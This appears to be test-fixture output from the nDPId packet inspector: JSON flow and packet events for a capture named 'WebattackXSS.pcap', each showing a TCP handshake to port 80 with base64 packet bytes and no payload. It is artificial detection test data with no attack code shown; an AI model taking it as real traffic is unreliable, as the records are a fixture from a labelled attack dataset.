+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347001111,"flow_last_seen":1499347001111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347001111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1499347001111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kNhAAD4GNPisEAABwKgKMs1eAFDMzJhIAAAAAKACchAidwAAAgQFtAQCCAoBOQiQAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1499347001111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzV4q6d3azMyYSaAScSA8qAAAAgQFtAQCCAoD4toHATkIkAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1499347001112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347001112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kNlAAD4GNP+sEAABwKgKMs1eAFDMzJhJKund24AQAOXbrwAAAQEICgE5CJAD4toH"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347002399,"flow_last_seen":1499347002399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347002399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1499347002399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d7tAAD4GThWsEAABwKgKMs1sAFBA8H5pAAAAAKACchDG4gAAAgQFtAQCCAoBOQnSAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1499347002399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzWx3BXtPQPB+aqAScSD2QAAAAgQFtAQCCAoD4ttJATkJ0gEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1499347002400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347002400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d7xAAD4GThysEAABwKgKMs1sAFBA8H5qdwV7UIAQAOWVSAAAAQEICgE5CdID4ttJ"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347003695,"flow_last_seen":1499347003695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347003695,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1499347003695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZUVAAD4GYIusEAABwKgKMs16AFBCXW5TAAAAAKACchDUOQAAAgQFtAQCCAoBOQsWAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1499347003695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzXqmA8avQl1uVKAScSCH9QAAAgQFtAQCCAoD4tyNATkLFgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1499347003696,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347003696,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZUZAAD4GYJKsEAABwKgKMs16AFBCXW5UpgPGsIAQAOUm\/QAAAQEICgE5CxYD4tyN"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347006233,"flow_last_seen":1499347006233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347006233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1499347006233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WV1AAD4GbHOsEAABwKgKMs2UAFDN5FTMAAAAAKACchBfpAAAAgQFtAQCCAoBOQ2RAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1499347006233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzZSBD41szeRUzaAScSBvHQAAAgQFtAQCCAoD4t8HATkNkQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1499347006234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347006234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WV5AAD4GbHqsEAABwKgKMs2UAFDN5FTNgQ+NbYAQAOUOJQAAAQEICgE5DZED4t8H"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347007496,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347007496,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xEhAAD4GAYisEAABwKgKMs2iAFDPCcqEAAAAAKACchDnfQAAAgQFtAQCCAoBOQ7MAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzaKR1tjLzwnKhaAScSCZlAAAAgQFtAQCCAoD4uBDATkOzAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xElAAD4GAY+sEAABwKgKMs2iAFDPCcqFkdbYzIAQAOU4nAAAAQEICgE5DswD4uBD"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347010080,"flow_last_seen":1499347010080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347010080,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1499347010080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aVxAAD4GXHSsEAABwKgKMs28AFAhFXgOAAAAAKACchDlSAAAAgQFtAQCCAoBORFSAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1499347010080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzbww\/OHGIRV4D6AScSDsuAAAAgQFtAQCCAoD4uLJATkRUgEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1499347010081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347010081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aV1AAD4GXHusEAABwKgKMs28AFAhFXgPMPzhx4AQAOWLvwAAAQEICgE5EVMD4uLJ"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347011349,"flow_last_seen":1499347011349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347011349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1499347011349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RzxAAD4GfpSsEAABwKgKMs3KAFCfKlWsAAAAAKACchCISQAAAgQFtAQCCAoBORKQAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1499347011350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011350,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzcqa6hS4nypVraAScSDxmwAAAgQFtAQCCAoD4uQHATkSkAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1499347011350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347011350,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rz1AAD4GfpusEAABwKgKMs3KAFCfKlWtmuoUuYAQAOWQowAAAQEICgE5EpAD4uQH"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347012617,"flow_last_seen":1499347012617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347012617,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1499347012617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mKRAAD4GLSysEAABwKgKMs3YAFAU4YtpAAAAAKACchDbigAAAgQFtAQCCAoBORPNAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1499347012617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzdgtNmaCFOGLaqAScSBfigAAAgQFtAQCCAoD4uVEATkTzQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1499347012618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347012618,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mKVAAD4GLTOsEAABwKgKMs3YAFAU4YtqLTZmg4AQAOX+kQAAAQEICgE5E80D4uVE"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347015165,"flow_last_seen":1499347015165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347015165,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1499347015165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wXxAAD4GBFSsEAABwKgKMs3yAFDEv9c2AAAAAKACchDdRwAAAgQFtAQCCAoBORZKAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1499347015165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzfKguKOtxL\/XN6AScSCuHQAAAgQFtAQCCAoD4ufAATkWSgEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1499347015166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347015166,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wX1AAD4GBFusEAABwKgKMs3yAFDEv9c3oLijroAQAOVNJQAAAQEICgE5FkoD4ufA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347016455,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347016455,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hwdAAD4GPsmsEAABwKgKMs4AAFB8BZCLAAAAAKACchBrXQAAAgQFtAQCCAoBOReMAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzgBumELLfAWQjKAScSDN8gAAAgQFtAQCCAoD4ukDATkXjAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hwhAAD4GPtCsEAABwKgKMs4AAFB8BZCMbphCzIAQAOVs+gAAAQEICgE5F4wD4ukD"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347017745,"flow_last_seen":1499347017745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347017745,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1499347017745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p+RAAD4GHeysEAABwKgKMs4OAFCFw78rAAAAAKACchAxrgAAAgQFtAQCCAoBORjPAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1499347017745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzg5V15svhcO\/LKAScSBTXgAAAgQFtAQCCAoD4upFATkYzwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1499347017746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347017746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p+VAAD4GHfOsEAABwKgKMs4OAFCFw78sVdebMIAQAOXyZQAAAQEICgE5GM8D4upF"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347020329,"flow_last_seen":1499347020329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347020329,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1499347020329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BsFAAD4Gvw+sEAABwKgKMs4oAFCq7R2UAAAAAKACchCrewAAAgQFtAQCCAoBORtVAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1499347020329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzijgzD+Kqu0dlaAScSCbVAAAAgQFtAQCCAoD4uzMATkbVQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1499347020330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347020330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BsJAAD4GvxasEAABwKgKMs4oAFCq7R2V4Mw\/i4AQAOU6XAAAAQEICgE5G1UD4uzM"} 